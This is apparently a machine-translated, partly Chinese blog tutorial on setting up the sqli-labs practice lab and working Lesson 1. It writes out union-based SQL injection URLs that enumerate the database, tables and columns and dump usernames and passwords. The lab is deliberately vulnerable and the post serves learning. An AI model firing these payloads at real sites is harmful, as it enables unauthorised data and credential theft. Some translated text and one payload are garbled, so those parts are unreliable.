sqli-labs learning sql injection

Language 2020-02-29 20:29:54 views: null

sqli-labs Installation and Configuration

Download sqli-labs and phpstudy (note PHP study version can not be higher than 8.0, or prone to error, it was PHP study version High, and has been an error)
the download is complete after sqli-labs on PHP study of extracting WWW folder
Here Insert Picture Description
open sqli -labs-master \ sql-connections, in which there is a db-creds.inc document, open the edit
Here Insert Picture Description
usually the default user name and password are root, then changed their input on the line after the change. Then the browser input http: // localhost / sqli-labs -master open
Here Insert Picture Description
Click Setup / reset Database for labs
Here Insert Picture Description
appear on behalf of this success.

Joint inquiry injection method

When sql inject some things should be remembered
information_schema inventory put information about all libraries
information_schema.columns contains fields for all the table
table_name table name
table_schema database name
column_name column names
information_schema.tables table containing names of all library
group_concat () function can the same line combined to save old things.

联合查询注入的原理
联合查询注入的前提就是要有显示位(通过查询从数据库返回到页面的内容)。
因本人为萌新一枚,在这里就以sqli-labs(一)为例子进行说明。
打开网站,进入Lesson 1
Here Insert Picture Description
1、判断注入点
闭合符号一般是’、“或者没有闭合符号,而注释符号一般是”) 和 --+
在搜索框内输入?id=1’,发现提示错误。
Here Insert Picture Description
用注释符号–+注释后发现正常

Here Insert Picture Description
说明注入点是单引号’
2、判断列数
在输入框内输入id=1,2,3;时,均有不同的数据返回。然后输入

http://http://localhost/sqli-labs-master/Less-1/?id=1' order by 4 --+

发现
Here Insert Picture Description
说明一共有三列
3、联合查询开始
输入

http://localhost/sqli-labs-master/Less-1/?id=0' union select 1,2,3 --+

在这里的意思是将id的值等于一个在数据库中不存在的数,通过联合查询可以看出输入的数据会在哪里显示出来。
Here Insert Picture Description
结果显示出了2 3的位置,所以在2 3位置我们便可以输入我们想用的句子。
爆数据库
爆数据库时可以通过一个**database()**语句来查看当前的数据库

http://localhost/sqli-labs-master/Less-1/?id=0' union select 1,database(),3 --+

Here Insert Picture Description
爆数据表
在上面说的一些语句,这里就要用到了
既然是爆数据表,首先就需要一个group_concat()函数加一个数据表名table_name,然后还需要指定一个来源,而来源就是所有库的表名从上面爆出来的数据库中

http://127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

Here Insert Picture Description
爆字段

http://127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,(select group_concat(column_name) from information_schema.column where table_schema='users'),3 --+

Here Insert Picture Description
爆值

http://127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,group_concat(username,0x3a,password),3 from users --+

Here Insert Picture Description
这样,值就被爆出来了!

墨子轩、
发布了3 篇原创文章 · 获赞 3 · 访问量 1548
Private letter concerns

Guess you like

Origin blog.csdn.net/qq_46041723/article/details/104498282
Recommended
The number of MaxKB GitHub Stars, an open source knowledge base question and answer system based on large language models, exceeded 5,000!
Ranking
Getting the basic concepts of ROS + catkin Profile
Spring Learning (2) --- Assembling Beans in the IoC Container
js to get the src attribute of the image regularly
STM32 is based on CubeIDE and HAL library basics entry study notes: Bluetooth WIFI STM32 connects to Alibaba Cloud
Short video learning - 3, pandas simple use of pivot_table
Print directory of project configuration log, output log
Understand the difference between vi and vim in Linux in 3 minutes
1 + x certificate Web front-end development HTML5 special exercises
mangodb save and insert the difference
7-1 Family tree processing (50 points) (binary tree solution)
Daily
More
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)

Code World

© 2018 codetd.com